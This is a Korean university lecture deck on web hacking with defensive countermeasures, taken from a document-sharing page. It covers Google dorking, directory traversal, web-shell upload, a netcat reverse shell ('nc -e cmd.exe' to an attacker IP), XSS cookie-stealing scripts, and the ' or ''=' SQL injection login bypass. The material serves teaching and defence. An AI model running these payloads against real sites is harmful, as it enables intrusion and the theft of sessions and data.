<4D F736F F F696E74202D FC0CEC5CDB3DD20BAB8BEC8205BC8A3C8AF20B8F0B5E55D>

Size: px
Start display at page:

Download "<4D F736F F F696E74202D FC0CEC5CDB3DD20BAB8BEC8205BC8A3C8AF20B8F0B5E55D>"

Transcription

1 이장에서다룰내용 정보보안개론 5 장 1 HTTP 프로토콜의동작원리를이해한다. 1 2 구글과같은검색엔진을통해정보를수집하는방법을알아본다. 2 3 웹해킹에서파일접근과관련된공격을살펴본다. 3 4 리버스텔넷을이해한다. 2 5 웹에서의인증의구조와이를우회하는방법을알아본다. 3 6 패킷변조를통해가능한공격을살펴본다. 2 7 XSS 공격및 SQL 삽입공격을살펴본다. Section 01 인터넷의역사 Section 01 인터넷의역사 처음에는대학에서연구실간데이터전송을위해, 단순히하나의시스템과다른하나의시스템간의통신을위한프로토콜을만듦. 프로토콜을해석한후이를다른프로토콜로바꾸어다른시스템으로전송해주는장치인게이트웨이 (Gateway) 가개발됨. 1969년에는미국방부산하고등연구계획국 ARPA(Advanced Research Projects Agency) 에의해전세계주요거점을연결하는네트워크가만들어짐. 이네트워크를알파넷이라부르는데, 흔히들이알파넷을인터넷의시작이라고칭함. 1994년한국통신이카이스트와연구기관등에학술교육 / 정보교류용으로제공한 하나망 을일반에개방하여코넷 (KORNET) 을시작함으로써인터넷에첫발을내딛게됨. WWW(World Wide Web) 는세계규모의거미집또는거미집모양의망이라는뜻으로흔히들짧게 웹 이라고읽는데, 1989년스위스제네바에있는유럽원자핵공동연구소 (CERN) 에서근무하던팀버너스리 (Tim Berners Lee) 에의해연구목적의프로젝트로시작됨. WWW 프로젝트의목적은전세계에흩어져있는종업원및연구자와연구결과나아이디어를공유할수있는방법을모색하는데있었음. 처음계획할무렵에는웹을 Hyper Text Project 라고명명하였음. Hyper Text 는 60년대에테드넬슨이만든신조어로써다른문서와연관관계를가지는텍스트를뜻함. Hyper Text를이용하면단어나문구를마우스로클릭해서관련주제에대한정보를추가로얻을수있다. 현재웹문서로가장흔히쓰이는 HTML(Hyper Text Markup Language) 은이Hyper Text를효과적으로전달하기위한스크립트언어. 웹에접근하기위해서는웹브라우저인모자이크의경우 1992년배포되었고, 글자위에서마우스버튼을클릭할수있는하이퍼링크 (Hyper Link) 가처음구현됨. 또한인터넷초기에붐을일으킨촉발제역할을함. 1994년에발표된네스케이프네비게이터는인터넷의대중화에기여했지만현재는사라짐.

2 HTTP HTTP HTTP(Hypertext Transfer Protocol) 0.9 버전부터사용되었다. 0.9 버전은서버로부터의단순읽기기능만지원. 클라이언트가웹브라우저를이용해서버에연결을요청한다. 연결요청을받은서버는그클라이언트에대해서비스를준비한다. 서버가준비상태가되면 (➊), 클라이언트는읽고자하는문서를서버에요청한다 (➋). 서버는웹문서중클라이언트가요청한문서를클라이언트에전송하고 (➌) 연결을끊음 (➍). 0.9 버전은하나의웹페이지안에서도텍스트와그림마다 Connect 과정을반복해서거쳐야했기때문에무척비효율적임. Request 패킷 웹서버에데이터를요청할때보내는패킷으로, GET/POST/HEAD 등의메소드가있음. GET 메소드 : 가장일반적. 웹브라우저에다음과같이요청데이터에대한인수를 URL(Uniform Resource Locator) 을통해전송. POST 메소드 : GET과함께가장많이쓰임.URL에요청데이터를기록하지않고소켓을이용해데이터를전송. 따라서 POST 방식에서는위예의?page=1& search= test 와같은부분이존재하지않음. POST 방식에서는인수값을 URL을통해전송하지않기때문에다른이가링크를통해해당페이지를볼수없음. 따라서접근이자유롭지못하고, 웹브라우저의 < 뒤로 > 버튼을클릭하면 POST의버퍼부분이사라져 새로고침 경고문구가뜨는단점이있음. 그러나파일업로드는 POST로만할수있으며, GET과는달리보내려는데이터가 URL을통해서노출되지않기때문에보안면에서매우중요함. 또한 GET 방식은보낼수있는데이터의크기가최대 4KB이지만, POST 방식은제한이없음. 일반적으로게시판의목록이나글보기화면은접근자유도를부여하기위해 GET 방식을사용하고, 글저장 / 수정 / 삭제등은보안등을위해서는 POST 방식을사용. HTTP 웹서비스 Response 패킷 클라이언트의 Request에대한응답패킷. 담겨있는주요내용으로는서버에서쓰이고있는프로토콜버전, Request에대한실행결과코드 (200) 및설명문 (OK) 이있으며, 전달할데이터의형식과데이터길이등과같은추가정보가 MIME 형식으로표현되어있음. 헤더정보뒤에는실제데이터 (HTML이나그림파일 ) 가전달됨. 데이터전달이끝나면서버는연결을끊음. HTML(Hyper Text Markup Language) 가장단순한형태의웹언어. 웹서버에 HTML 문서를저장하고있다가클라이언트가특정 HTML 페이지를요청하면해당 HTML 문서를클라이언트로전송해주는데, 이런웹페이지를정적인 (Static) 웹페이지라고함. 클라이언트의웹브라우저를통해웹서버의무엇인가를바꿀수있는가능성이매우낮기때문에웹을이용한공격이매우어려움.

3 웹서비스 웹서비스 SSS (Server Side Script) ASP(Active Server Page), JSP( Java Script Pages) 와같은언어가개발됨. ASP나 JSP와같은동적인페이지를제공하는스크립트를 SSS(Server Side Script) 라함. 스크립트에HTML 확장자대신 ASP 또는 JSP의확장자를가진웹문서를요청하면 ASP는 DLL이나OCX 같은파일을이용해, JSP는서블릿을이용해요청을처리. 그런다음그결과를 HTML 파일로만들어클라이언트에전송. CSS (Client Side Script) 웹서비스에이용되는스크립트에는자바스크립트 ( JavaScript) 나비주얼베이직스크립트 (Visual Basic Script) 등이있음. 이들은서버가아닌클라이언트측의웹브라우저에의해해석되고적용되는데, 이를 CSS(Client Side Script) 라함. Section 03 정보수집과구글해킹 웹사이트에대한정보수집 웹사이트에대한정보수집 웹해킹의첫번째는웹사이트의정보를수집하는것. 홈페이지에서게시판이나자료실, 로그인부분이있는지, 또는홈페이지파일의확장자가 ASP 인지 JSP 나 PHP 인지를확인. 파일확장자만으로도시스템이윈도우기반인지유닉스기반인지유추할수있고, 이를바탕으로웹서버의정보수집과취약점분석을위한범위를좁힐수있음. 웹프록시 PAROS를이용한정보수집 웹프록시 PAROS의인터페이스 오른쪽위에는웹서버에대한요청 (Request), 응답 (Response), 현재붙잡고있는 (Trap) 창이나타난다. Trap에서는아래쪽의 Trap request와 Trap response 항목을체크해야해당패킷을붙잡아보는것이가능.

4 웹사이트에대한정보수집 웹사이트에대한정보수집 웹프록시 PAROS 사용을위한브라우저설정 [ 도구 ]-[ 인터넷옵션 ]-[ 연결 ]-[LAN 설정 ] 에서프록시서버를다음과같이설정해주어야함 을흔히루프백 (Loopback) 주소라하는데, PC 자기자신을가리킨다. 8080은 Paros의서비스포트임. PAROS 를이용한취약점수집. 웹사이트에대한정보수집 웹사이트에대한정보수집 Paros 의 Spider 기능을이용해웹서버의구조정보를수집. OWASP(Open Web Application Security Project) 에서는주요웹취약점을매년발표하고있음.

5 구글해킹 구글해킹 구글해킹 웹해킹을하면서많은정보를수집하는유용한방법이검색엔진을이용하는것임. 흔히이러한정보수집방법으로구글을사용. 구글에서제공하는고급검색기능 Site 특정사이트만을집중적으로선정해서검색할때유용. wishfree.com 도메인이있는페이지에서 admin 문자열을찾으라는예 site:wishfree.com admin Filetype 특정파일유형에대해검색할때사용. 검색어로파일확장자가 txt 이고패스워드라는문자열이들어간파일을검색한화면 filetype:txt 패스워드 구글해킹 구글해킹 link 특정링크가포함되어있는페이지를검색할때사용. 예를들어, link: 이라고입력해검색하면 주소를링크하고있는웹페이지를검색 intitle 디렉토리리스팅취약점이존재하는사이트를쉽게찾을수있음 intitle:index.of admin cache 구글에서백업해둔페이지의정보를보고자할때사용. cache:wishfree. com과같이검색하면구글에저장된페이지를보여줌. 관리자가자신이관리하는웹의취약점을확인하여이를수정하더라도, 가끔검색엔진에의해백업된데이터에취약점정보가남는경우가있기때문에관리자도검색엔진에백업된자신의사이트를한번쯤살펴볼필요가있음. 노출되면안되는정보가백업되어있을경우에는이를삭제해달라고정식으로요청해야함. inurl site 와기능이유사. inurl:login inurl:wishfree.com 과같이검색하면 URL 에 wishfree.com 과 login 이라는문자열을모두포함하는사이트를검색.

6 구글해킹 구글해킹 검색엔진의검색을피하는방법 서버의홈디렉토리에 robots.txt 파일을만들어검색할수없게만듬. 파일이있으면구글검색엔진은 robots.txt 에있는디렉토리는검색하지않음. robots.txt 파일은 Useragent 와 Disallow 를이용. User-agent 는구글검색엔진으로부터의검색을막기위해서다음과같이사용. User-agent: googlebot 모든검색로봇으로부터검색을막으려면아래와같이입력 User-agent: * Disallow 필드는특정파일이나디렉토리를로봇이검색하지못하도록설정. dbconn.ini 파일을검색하지못하도록하려면 robot.txt 파일에다음과같이입력. Disallow: dbconn.ini 다음과같이입력하면 admin 디렉토리에접근하지못함. Disallow: /admin/ Section 04 파일접근 Section 04 파일접근 디렉토리리스팅 웹브라우저에서웹서버의특정디렉토리를열면그디렉토리에있는파일과디렉토리목록이모두나열되는것 디렉토리리스팅 화면에보이지않는여러웹페이지를클릭하나만으로도직접접근할수있음.

7 Section 04 파일접근 Section 04 파일접근 임시 / 백업파일접근 상용프로그램을이용한편집은확장자가 bak이나 old인백업파일을자동으로생성. 또한이러한백업파일들은서버측에서실행되고결과만웹페이지로보여주는 ASP, JSP 파일과는달리클라이언트가그파일을직접다운로드받을수있게해줌. 다운로드한소스파일에는서버의로직뿐만아니라네트워크정보등다양한정보가있을수있고, 대부분의웹스캐너는이러한파일을자동으로찾을수있음. 상용에디터등을이용해웹소스를직접편집하는것을금함. 파일다운로드 파일을다운로드할때가장많이쓰이는방법은웹서버에서제공하는파일다운로드페이지를이용. 정상적인경우 파일다운로드 파일시스템에서. 은현재디렉토리를,.. 은상위디렉토리를의미. 공격자가 filename 변수에../list.jsp 라고입력하면, 이것은다운로드가기본적으로접근하는 /board/upload 디렉토리의바로상위디렉토리에서 list.jsp 를다운로드하라는의미. 사업계획.hwp 게시판에서글목록을보여주는 list.jsp 파일이 board 에위치한다면주소창에다음과같이입력하여다운로드가능. Section 04 파일접근 Section 04 파일접근 파일다운로드 /board/admin 디렉토리에있는 adminlogin.jsp를다운로드하려면다음과같이입력. download.jsp 파일자신도다음과같이다운로드할수있음. 파일업로드 시스템내부명령어를실행시킬수있는웹프로그램 (ASP나 JSP, PHP) 을제작하여자료실과같은곳에공격용프로그램을업로드하는공격방식. 이공격용프로그램은웹에서브라우저를이용해접근하면시스템내부명령어를실행시킬수있음. 웹에서명령을입력할수있도록만든 cmdasp.asp라는프로그램을게시판에업로드. 시스템내부의중요파일도위와같은방법으로다운로드를시도. 유닉스시스템의경우 /etc/passwd 와같이사용자계정과관련된중요파일을다음과같은형태로시도해볼수있음.

8 Section 04 파일접근 Section 04 파일접근 파일업로드 취약점 asp 확장자를가진파일이아무런필터링없이업로드된다는취약점이존재. 업로드를할때는파일확장자를체크해야하고, 시스템에서는 asp나 jsp 같은대소문자의혼합도인식하기때문에가능한조합을모두필터링해야함. 반대로특정확장자를가진파일만업로드하도록설정하는방법도있음. 파일업로드 명령창을실행시키기위한 cmdasp.asp 의주소 ( 를웹브라우저주소창에직접입력하여실행하면웹브라우저에입력창과 <Run> 이라는버튼을확인할수있다. 다음그림은명령을입력하는입력란에 dir c:\ 를입력하고, <Run> 버튼을누른결과다. dir c:\ 명령을실행한결과로, C 드라이브에존재하는디렉토리와파일명을확인할수있음. 필터링수행시자바스크립트와같은클라이언트측스크립트언어로필터링하면안됨. 클라이언트측스크립트언어는공격자가수정할수있기때문에ASP나 JSP 같은서버측스크립트언어에서필터링해야함. 첨부파일에마우스를가져가면브라우저의아래쪽에 이경로정보는공격자에게매우중요하기때문에웹브라우저에서도웹프록시를통해노출되면안됨. 저장파일이름이아무런변환없이그대로저장된다는것이다. 웹서버에악성파일이업로드되어도해당파일을찾을수없게파일이름과확장자를변환시켜저장하면훨씬높은수준의보안성을확보할수있음. Section 05 리버스텔넷 Section 05 리버스텔넷 일반적으로웹서버는방화벽내부에존재. 그리고웹서버는 80번포트를이용한웹서비스만제공하면되기때문에, 방화벽은외부인터넷을사용하는사용자에대해 80포트만을허용. 이런경우에는웹서버의텔넷 (Telnet) 이열려있어도방화벽으로인해공격자가외부에서접근할수없음. 리버스텔넷 심화된공격을하기위해서는텔넷과유사한접근권한을획득하는것이매우중요. 방화벽에서인바운드정책 ( 외부에서방화벽내부로들어오는패킷에대한정책 ) 은 80 번포트외에필요한포트만빼고다막아놓지만아웃바운드정책 ( 내부에서외부로나갈때에대한정책 ) 은별다른필터링을수행하지않는경우가많음. 리버스텔넷은이런허점을이용.

9 Section 05 리버스텔넷 Section 05 리버스텔넷 리버스텔넷실행과정예 ➊ 명령창획득 : 파일업로드등을통해공격자가명령을입력할수있는명령창을획득. ➋ 리버스텔넷용툴업로드 : nc 와같은리버스텔넷용툴을서버게시판의파일업로드기능을이용해업로드. ➍ 획득한명령창을통해공격자에게리버스텔넷을보내줌. 이때, 업로드한 nc 파일이위치한전체경로를입력해주어야함. 이때공격자 IP 는 c:\inetpub\wwwroot\bbs\upload\nc -e cmd.exe [ 공격자 IP] 80 ➎ 리버스텔넷창을획득. IP 가웹서버의 로바뀐것을확인할수있음 ➌ 공격자 PC 리버스텔넷데몬 (daemon) 활성화 : 서버에서리버스텔넷을보내면이를받아텔넷을열수있도록리버스텔넷툴을다음과같이실행. nc -l -p 80 Section 05 리버스텔넷 Section 06 인증우회 리버스텔넷예 인증우회 관리자페이지나인증이필요한페이지에대한인증미처리로인해인증을우회하여접속할수있게되는취약점. 이취약점에노출되면일반사용자나로그인하지않은사용자가관리자페이지에접근하여관리자권한의기능을악용할수있음. 인증우회의예 관리자로로그인해서관리자용웹페이지에접속할수있어야하는데, 로그인을하지않고도관리자용웹페이지에서특정작업을직접수행할수있는것 를통해관리자로로그인한후에야 www. wishfree.com/admin/boardadmin.asp 에접근할수있어야하는데, 관리자로로그인하지않은채로 에바로접근해게시판을관리하는경우. 리버스텔넷예방법 파일업로드를먼저막아야함. asp 뿐만아니라리버스텔넷툴같은것을실행하지못하도록 exe 나 com 같은실행파일도업로드를못하게해야함. 또한외부에서내부로의접속뿐만아니라내부에서외부로의불필요한접속도방화벽으로막는것이좋음. 인증우회의보안책 인증우회를막기위해서는웹에존재하는중요페이지에세션값 ( 쿠키 ) 을확인하도록검증로직을입력해두어야함

10 서버에서클라이언트로전송되는패킷변조 웹사이트가언어로개발됐든지웹프록시를통해서확인하는것은 HTML. 테스트환경으로사용하는웹페이지의게시판에서하나의글에대한열람을시도. 웹프록시를이용해내용을변조. 인터넷익스플로러에프록시설정을하고게시판글목록에서웹프록시에서 Trap 을건후글열람. 다음과같이해당글에대한열람을시도하는패킷이서버에최초로전송됨을확인할수있음. test 라는제목을클릭하면다음과같은내용을확인할수있음. GET 을통해서 /bbs/board_view.asp?num=3, 즉게시판의 3 번째글을보여줄것을서버에요청. 응답패킷에서 test 라고입력된제목과본문을확인할수있음. test 라고된내용을 What a amazing day! 로바꾸어입력.

11 바뀐결과확인. 서버에서전달되는패킷변조를통한공격유형 클라이언트에해킹하고자하는대상이있는경우. 웹브라우저내용만바꾸었지만실제로는 Active X 등의형태로여러프로그램이클라이언트에설치되어웹서비스를제공하는경우가많음. 이때클라이언트에설치된서비스프로그램을속이는것이가능. 서버에서클라이언트에정보를전송했다가이를다시전송받아처리하는경우. 예를들면서버에서변수 A의값이20임을확인하고이값을클라이언트에전송. 그리고서버는전송한변수 A가필요할때자신의데이터베이스에서다시읽지않고, 클라이언트가관련서비스수행할때서버에다시전송해주는 A 값을참조하여서비스를수행하는경우. 2 단계에서 A=40 이라고바꾸어전송하면 A 값이다음과같이흘러감. 클라이언트에서서버로전송되는패킷변조 앞서 test 라는글을열람할때와똑같은상황에서이번에는 /bbs/board_view.asp? num=3 에서글번호인 3 을 4 로바꾸어봄. 패킷변조예 건망증이심한여자친구를속여돈을빼앗는못된남자의이야기

12 그결과는게시판에서 4 번째글을클릭했을때와같음. 그결과는게시판에서 4 번째글을클릭했을때와같음. 클라이언트에서서버로전송되는패킷을변조하는것은일반적인웹서비스의메뉴상접속할수없는것에접근하거나특정한값을넣어시스템의오작동을유도하기위한목적으로사용. 클라이언트에서서버로전송되는패킷을변조하는것은일반적인웹서비스의메뉴상접속할수없는것에접근하거나특정한값을넣어시스템의오작동을유도하기위한목적으로사용. XSS 'Cross Site Scripting' 의약자로줄여서 CSS라고도부르나웹에서레이아웃과스타일을정의할때의사용되는캐스케이딩스타일시트 (Cascading Style Sheets) 와혼동되어일반적으로 XSS라고함. XSS는과부하를일으켜서버를다운시키거나요즘문제가되는피싱 (Phishing) 공격의일환으로사용되기도하지만가장일반적인목적은웹사용자의정보추출. 쿠키 (COOKIE) 1994년네스케이프에의해처음사용된기술로, 사용자들이웹사이트를세션을유지하면서편리하게이용할수있도록하기위해만들어짐. 쿠키는사용자가인터넷웹사이트에방문할때생기는 4KB 이하의파일. 클라이언트가웹사이트에방문하면접근기록이클라이언트에파일로남고, 이파일은사용자와웹사이트를연결해주는정보를담고있음. 쿠키의예 C:\Document and Settings\ 사용자이름 \Cookies에서여러분이인터넷을이용할때만들어진쿠키를확인할수있음. 쿠키파일은같이 접속한사이트 형태로구성됨. 그내용은웹사이트나상황에따라다르지만쿠키를만든사이트의도메인이름, 그사이트를구분하는숫자, 쿠키의만기일과같은정보로이루어져있음. Set-Cookie: Name=Value; expires=date; Path=PATH; domain=domain_name: Secure

13 쿠키의용도 사이트개인화 장바구니시스템 웹사이트이용방식추적 타겟마케팅 XSS 공격의실제 정상적인게시판의글작성과열람 쿠키에관한오해 쿠키가바이러스를전파한다? 쿠키는사용자컴퓨터에피해를입힌다? 특정웹사이트가저장한쿠키를다른웹사이트에서도읽어들일수있다? XSS 테스트코드를게시판의본문에입력. <script>alert(document.cookie)</script> XSS 테스트코드를입력한게시판글열람 해당글의내용이보이지않고스크립트가실행. 화면에뿌려지는것은현재사용자의쿠키값임.

14 XSS 를이용한쿠키획득 <script>url=" ="+document.cookie;window.open(url,width=0, height=0);</script> 메일서비스를이용한 XSS 공격 XSS 공격은메일과같이특정인에게정보를발송하는경우에도가능. 메일의본문에 XSS 공격코드를입력한후이를특정인에게보내메일을이용하는사람의세션정보를담고있는쿠키값을공격서버에전송하도록함. 코드는게시판을열람할때사용자의쿠키정보가해커의웹서버 ( ) 로전송되게함. 물론글을읽는사람에게는다음과같이본문외의내용은보이지않음. Section 09 SQL 삽입공격 XSS를이용한 DoS 공격 XSS 문으로쿠키값을알아내는앞의스크립트가아닌취약페이지를재참조하는스크립트를입력하면 XSS 취약점이있는페이지에서무한루프가발생할수있음. XSS 공격에대한대응책 이러한 XSS 공격을차단하는방법은특수문자에대한필터링을철저히하여 XSS와같은스크립트코드가실행되지않도록하는것임. SQL 문에대한이해 MS-SQL 2000 의쿼리분석기 왼쪽에는지금까지우리가이용한서버의데이터베이스목록이존재. 마지막에웹서버와연동되는 web이라는데이터베이스가위치하고있음. 그리고게시판테이블인 board와사용자정보테이블인 member, 우편번호정보가들어있는 zipcode는필자가생성한테이블을확인할수있음.

15 Section 09 SQL 삽입공격 Section 09 SQL 삽입공격 Member 테이블정보확인 select user_id from member 웹로그인시의 SQL 문 웹에서사용자가 ID와패스워드입력창에자신의 ID와패스워드를입력하면, 다음과같은 SQL 문이작성되어데이터베이스에전송됨. select user_id from member where user_id =' 입력된아이디 ' AND user_pw=' 입력된패스워드 ' select user_id from member where user_id ='wishfree' AND user_pw='dideodlf Section 09 SQL 삽입공격 Section 09 SQL 삽입공격 잘못된패스워드입력 select user_id from member where user_id ='wishfree' AND user_pw='did' 실제웹로그인소스 Qeury = "SELECT user_id FROM member WHERE user_id = '"&struser_id&" ' AND password = ' '&strpassword&" ' " strauthcheck = GetQueryResult(Query) If strauthcheck = " " then boolauthenticated = Fasle Else boolauthenticated = True EndIf SQL 삽입공격은어떤수단을쓰든 SQL의결과값이 NULL이나오지않게, 즉출력값이사용자 ID가되도록하여로그인하는것. 조건값에 ' or ''=' 을입력하면 where로입력되는조건문을항상참으로만들수있음.

16 Section 09 SQL 삽입공격 Section 09 SQL 삽입공격 SQL 삽입공격공격확인 웹에서잘못된패스워드입력시 SELECT user_id FROM member WHERE user_id = '' or ''='' AND user_pw = '' or ''='' 웹에서 SQL 삽입공격시 Section 09 SQL 삽입공격 요약 SQL 문이결과적으로참이될수있다면 SQL 삽입공격에사용되는 SQL 문은무엇이라도상관없음. 이러한 SQL 삽입공격은로그인뿐만아니라웹에서사용자의입력값을받아데이터베이스에 SQL 문으로데이터를요청하는모든곳에가능. SQL 삽입공격을막는방법은사용자가입력창을통해서 SQL 문을완성하여데이터베이스에전송할때이입력값중에특수문자가존재하는지여부를필터링하는것. 인터넷의역사 1969년미국방부산하고등연구계획국 ARPA(Advanced Research Projects Agency) 에의해전세계주요거점을연결하는네트워크구성 1989년스위스제네바에있는유럽원자핵공동연구소 (CERN) 에서근무하던팀버너스리 (Tim Berners Lee) 가WWW 프로젝트시작 HTTP GET: 요청데이터에대한인수를 URL(Uniform Resource Locator) 을통해전송한다. 보낼수있는데이터의최대크기는 4KB이다. POST: URL에요청데이터를기록하지않고소켓을이용해데이터를전송한다. 웹언어 SSS(Server Side Script): ASP나 JSP와같은동적인페이지를제공한다. 확장자가 asp나 jsp인웹문서를요청하면서버가 asp는 DLL이나 OCX와같은파일을이용, jsp는서블릿을이용해그요청을처리한결과를 HTML 파일로만들어클라이언트에전송한다. CSS(Client Side Script): 웹서비스에이용되는스크립트로, 자바스크립트나비주얼베이직스크립트, JScript 같은것이있다. 서버가아닌클라이언트측의웹브라우저에의해해석되고적용된다.

17 요약 요약 구글해킹 파일접근 디렉토리리스팅 : 특정디렉토리를브라우저에서열람했을때디렉토리에있는모든파일이나타나는문제점, 예방책은웹서버의설정을수정하거나패치수행 임시 / 백업파일접근 : old, bak 등의임시및백업파일들을접근하여다운로드 파일다운로드 : 웹에서제공하는파일다운로드서비스를이용해임의의파일다운로드 파일업로드 : 매우간단하면서도효과가큰공격으로공격용프로그램을게시판이나자료실에있는파일첨부기능을이용하여공격하는방법. 대응책은파일의확장자를서버스크립트언어에서필터링수행 리버스텔넷 (Reverse Telnet) 웹해킹을통해시스템의권한을획득한후해당시스템에텔넷과같이직접명령을입력하고확인할수있는쉘을획득하기위한방법. 공격대상인서버에서공격자인클라이언트로텔넷접속을넘겨주는방식으로텔넷연결을생성한다. 인증우회 로그인과정을거치면사용자세션이생성되는데, 세션체크가지속적으로이루어지지않아임의의페이지에인증을거치지않고접근이가능한취약점. 대응책은관리자페이지에세션검증로직삽입하는것이다. 패킷변조 클라이언트와서버사이에전송되는패킷을변조하는것이다. XSS 웹사이트가사용자의입력값을받을때특정악성스크립트가실행되어사용자의쿠키값과같은중요정보가공격자에게추출당하는취약점. 대응책은사용자의입력값에대한적절한필터링을수행하는것이다. SQL 삽입공격 데이터베이스와연동되는입력란에공격자가원하는 SQL 문을삽입하여공격. SQL 삽입공격을통해공격자는로그인인증을우회하거나다른테이블의내용을열람가능. 대응책은사용자의입력을받아데이터베이스와연동하는부분은특수문자등의입력값을필터링하는것이다. 정보보안개론 5 장끝 67

정보보안개론 5 장

정보보안개론 5 장 정보보안개론 5 장 이장에서다룰내용 1 1 2 2 3 3 4 2 5 3 6 2 HTTP 프로토콜의동작원리를이해한다. 구글과같은검색엔진을통해정보를수집하는방법을알아본다. 웹해킹에서파일접근과관련된공격을살펴본다. 리버스텔넷을이해한다. 웹에서의인증의구조와이를우회하는방법을알아본다. 패킷변조를통해가능한공격을살펴본다. 7 XSS 공격및 SQL 삽입공격을살펴본다. Section

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Chapter 04. 웹보안 : 웹, 그무한한가능성과함께성장한해킹 1. 웹에대한이해 2. HTTP에대한이해 3. 웹서비스에대한이해 4. 웹해킹에대한이해 5. 웹의주요취약점 10가지 6. 웹취약점보안 01 웹에대한이해 인터넷의역사 처음에는대학에서연구실간데이터전송을위해, 단순히하나의시스템과다른하나의시스템간의통신을위한프로토콜을만듦. 프로토콜을해석한후이를다른프로토콜로바꾸어다른시스템으로전송해주는장치인게이트웨이

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 chapter 3. 기본웹해킹 1. 정보수집 해커들이웹사이트를해킹하기위해대상시스템의운영체제나어플리케이션버전등과같은대상시스템의정보를수집하는것을의미한다. -2- 일반적인해킹단계 정보수집 취약점분석 실제공격 사후처리 웹스캔포트스캔 Application 종류, 버전 OS종류, 버전등등 OS종류, 버전취약점 Application 취약점 리모트어택웹, DB, SQL injection,

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

Microsoft Word - src.doc

Microsoft Word - src.doc IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...

More information

untitled

untitled 웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

PowerPoint Template

PowerPoint Template JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher( 실행할페이지.jsp); 다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

The Pocket Guide to TCP/IP Sockets: C Version

The Pocket Guide to  TCP/IP Sockets: C Version 인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)

More information

